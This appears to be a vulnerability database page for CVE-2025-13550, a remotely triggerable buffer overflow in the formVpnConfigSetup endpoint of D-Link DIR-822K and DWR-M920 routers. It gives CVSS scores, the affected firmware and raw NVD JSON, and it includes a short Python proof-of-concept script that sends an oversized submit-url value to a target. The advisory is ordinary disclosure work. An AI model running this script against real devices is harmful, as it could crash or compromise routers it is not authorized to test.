Security Vulnerability Report
中文
CVE-2025-13550 CVSS 8.8 HIGH

CVE-2025-13550

Published: 2025-11-23 13:15:47
Last Modified: 2025-12-02 03:32:17
Source: [email protected]

Description

A vulnerability was determined in D-Link DIR-822K and DWR-M920 1.00_20250513164613/1.1.50. Impacted is an unknown function of the file /boafrm/formVpnConfigSetup. Executing manipulation of the argument submit-url can lead to buffer overflow. The attack can be executed remotely. The exploit has been publicly disclosed and may be utilized.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:dlink:dir-822k_firmware:1.00_20250513164613:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:dlink:dir-822k:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:dlink:dwr-m920_firmware:1.1.50:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:dlink:dwr-m920:b2:*:*:*:*:*:*:* - NOT VULNERABLE
D-Link DIR-822K 固件版本 <= 20250513164613
D-Link DWR-M920 固件版本 <= 1.1.50

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-13550 PoC - D-Link DIR-822K/DWR-M920 Buffer Overflow # Target: /boafrm/formVpnConfigSetup def exploit_buffer_overflow(target_ip, target_port=80): """ Exploit buffer overflow in submit-url parameter This PoC demonstrates sending an oversized submit-url parameter """ target_url = f"http://{target_ip}:{target_port}/boafrm/formVpnConfigSetup" # Generate large payload to trigger buffer overflow # The exact offset may vary, this is a demonstration payload overflow_length = 2048 # Adjust based on actual vulnerable version malicious_payload = "A" * overflow_length # Construct the exploit request data = { "submit-url": malicious_payload, "vpn-type": "pptp", "pptp-server": "vpn.example.com", "pptp-user": "test", "pptp-password": "test123" } try: print(f"[*] Sending exploit payload to {target_url}") print(f"[*] Payload length: {overflow_length} bytes") response = requests.post(target_url, data=data, timeout=10) print(f"[+] Request sent successfully") print(f"[*] Response status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False return True if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_ip> [port]") sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) if len(sys.argv) > 2 else 80 exploit_buffer_overflow(target, port)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13550", "sourceIdentifier": "[email protected]", "published": "2025-11-23T13:15:46.680", "lastModified": "2025-12-02T03:32:17.430", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was determined in D-Link DIR-822K and DWR-M920 1.00_20250513164613/1.1.50. Impacted is an unknown function of the file /boafrm/formVpnConfigSetup. Executing manipulation of the argument submit-url can lead to buffer overflow. The attack can be executed remotely. The exploit has been publicly disclosed and may be utilized."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "baseScore": 9.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-120"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dlink:dir-822k_firmware:1.00_20250513164613:*:*:*:*:*:*:*", "matchCriteriaId": "52F1E054-875F-45D6-AA5A-48ADA247E7E6"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dlink:dir-822k:-:*:*:*:*:*:*:*", "matchCriteriaId": "DC2A08EF-B518-4E83-9B1D-178E70CC8584"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dlink:dwr-m920_firmware:1.1.50:*:*:*:*:*:*:*", "matchCriteriaId": "2C932664-064A-41BC-92E2-174EB65427C6"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dlink:dwr-m920:b2:*:*:*:*:*:*:*", "matchCriteriaId": "1FA1FA30-710E-4C9F-AE23-793213FE0220"}]}]}], "references": [{"url": "https://github.com/QIU-DIE/CVE/issues/33", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://github.com/QIU-DIE/CVE/issues/47", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://vuldb.com/?ctiid.333317", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.333317", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.693777", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.695437", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.dlink.com/", "source": "[email protected]", "t ... (truncated)
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.